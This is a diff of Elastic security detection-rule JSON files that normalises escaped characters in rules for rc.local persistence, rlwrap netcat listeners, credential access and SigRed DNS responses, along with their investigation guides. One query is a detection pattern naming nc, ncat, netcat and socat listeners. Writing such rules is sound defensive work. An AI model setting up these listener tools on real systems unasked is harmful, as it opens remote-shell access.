registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json index 3616c131056..abe6d2a844e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json @@ -18,7 +18,7 @@ "process.executable", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json index 5fd9ec3d637..546fa727a0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Netcat Listener Established via rlwrap", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count \u003e= 4\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count >= 4\n", "related_integrations": [ { "package": "endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json index c98e7ff0700..5525e929fb5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Netcat Listener Established via rlwrap", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count \u003e= 4\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count >= 4\n", "related_integrations": [ { "package": "endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json index 3ba8c368994..5fae26a439b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json index ae970f335f4..dfdcddfd69b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json index 68b3f7b8524..7afbac69a14 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json index c5c987e610a..6b4b4bd97e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json index b39dbcfcffa..c099738d68d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json index 429d2e882b8..dc9ac6afe97 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json index c6c8ea42358..b68fefe5718 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json index 022d74ade22..2cfd4128452 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json index d32388704b9..bbe24500a22 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json index b87f8c893eb..0dcb87cf968 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json index 640cfe0b02c..1a48a7b847b 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json index e4cb94733f8..266d69b6867 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json index 47781b349ee..eb2b600333d 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json index 30991c035ad..e95f994cb4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch 